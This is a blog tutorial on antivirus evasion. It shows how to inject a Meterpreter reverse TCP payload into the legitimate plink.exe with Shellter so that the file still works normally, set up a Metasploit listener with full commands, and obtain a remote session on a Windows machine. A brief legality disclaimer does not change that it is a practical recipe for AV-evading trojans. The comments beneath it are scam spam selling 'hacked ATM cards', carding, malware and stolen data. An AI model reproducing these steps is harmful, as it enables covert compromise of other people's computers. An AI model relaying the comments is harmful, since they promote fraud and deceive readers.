Anti-Virus Bypass With Shellter 6.0 On Kali Linux - HacCoders

Thursday, 4 February 2016

Anti-Virus Bypass With Shellter 6.0 On Kali Linux

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

Hello Every One Welcome To HacCoders (Information You Can Trust!).. So Today We Will Discuss Anti-Virus ByPass With Shellter.. But First Know What Is Shellter Because Many People Don't Know What is Shelter.. So Let's Start... :)

What Is Shellter..


Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).

The shellcode can be something yours or something generated through a framework, such as Metasploit.
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.

Shellter uses a unique dynamic approach which is based on the execution flow of the target application, and this is just the tip of the iceberg.

 Shellter is not just an EPO infector that tries to find a location to insert an instruction to redirect execution to the payload. Unlike any other infector, Shellter’s advanced infection engine never transfers the execution flow to a code cave or to an added section in the infected PE file.


So enough talk, let’s see it in action!

(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)

1. Download and install “shellter” ( https://www.shellterproject.com/download/ )
I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.
2. Grab “plink.exe” from Kali’s ‘usr/share/windows-binaries’ directory and copy it into the Shellter directory.
3. Change to the ‘/root/Desktop/shellter’ directory.
4. Start Shellter – type, “wine shellter.exe”

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


5. Enter “A” for automatic
6. At the PE Target Prompt, enter “plink.exe
7. When prompted to enable stealth mode enter “Y”:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux
 

This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.

8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)

Anti-Virus Bypass with Shellter 5.1 on Kali Linux
 


Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux



You will now have a ‘plink.exe’ (the shellcoded file) and ‘plink.exe.bak’ (the original file) in the Shellter directory.

11. Now we need to start a listener service on the Kali system using the same settings from above:
  • start Metasploit (‘msfconsole’ in a terminal)
  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp
  • set lhost 192.168.1.39
  • set lport 4545
  • exploit
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


12. Copy the ‘plink.exe’ file to the Windows system:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


13. Now, in Windows, If you run plink.exe from the command prompt:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux


It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:
 
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:
 
Anti-Virus Bypass with Shellter 5.1 on Kali Linux


We can run “sysinfo” to view information about the computer:

Anti-Virus Bypass with Shellter 5.1 on Kali Linux

 
So We Are Sucsess.. Thanks For Reading..


3 comments:

  1. I was searching for loan to sort out my bills& debts, then i saw comments about Blank ATM Credit Card that can be hacked to withdraw money from any ATM machines around you . I doubted thus but decided to give it a try by contacting {skylinktechnes@yahoo.com} they responded with their guidelines on how the card works. I was assured that the card can withdraw $5,000 instant per day & was credited with $50,000 so i requested for one & paid the delivery fee to obtain the card, i was shock to see the UPS agent in my resident with a parcel{card} i signed and went back inside and confirmed the card work's after the agent left. This is no doubts because i have the card & has made used of the card. This hackers are USA based hackers set out to help people with financial freedom!! Contact these email if you wants to get rich with this Via email skylinktechnes@yahoo.com or whatsapp: +1(213)785-1553

    ReplyDelete

  2. BE SMART AND BECOME RICH IN LESS THAN 3DAYS (williamshackers@hotmail.com)… It all depends on how fast you can be to get the new PROGRAMMED blank ATM card that is capable of hacking into any ATM machine,anywhere in the world. I got to know about this BLANK ATM CARD when I was searching for job online about a month ago..It has really changed my life for good and now I can say I'm rich and I can never be poor again. The least money I get in a day with it is about $50,000.(fifty thousand USD) Every now and then I keeping pumping money into my account. Though is illegal,there is no risk of being caught ,because it has been programmed in such a way that it is not traceable,it also has a technique that makes it impossible for the CCTVs to detect you..For details on how to get yours today, email the hackers on : (williamshackers@hotmail.com). Tell your loved once too, and start to live large. That's the simple testimony of how my life changed for good…Love you all …the email address again is email (williamshackers@hotmail.com)…

    ReplyDelete
  3. Tele-gram - @leadsupplier
    ICQ - 75 28 22 040
    Skype/Wickr - peeterhacks

    Stuff Available Now
    Cardi-ng
    Spam-ming
    Hac-king
    FULLZ/Pros/Leads
    Mailers
    Vir-uses
    Kal-i Lin-ux Full Package
    De-ep Web Complete Course
    Smtp's/rdp's/c-panles/shells
    BTC Cr-acker/Flasher
    Penetration Testing
    FB/WA Hac-king Tricks
    Ke-yloggers
    Combos
    Premium Accounts
    LOGs
    etc

    Feel Free to contact
    Guidance will be provided
    Available 24/7

    ReplyDelete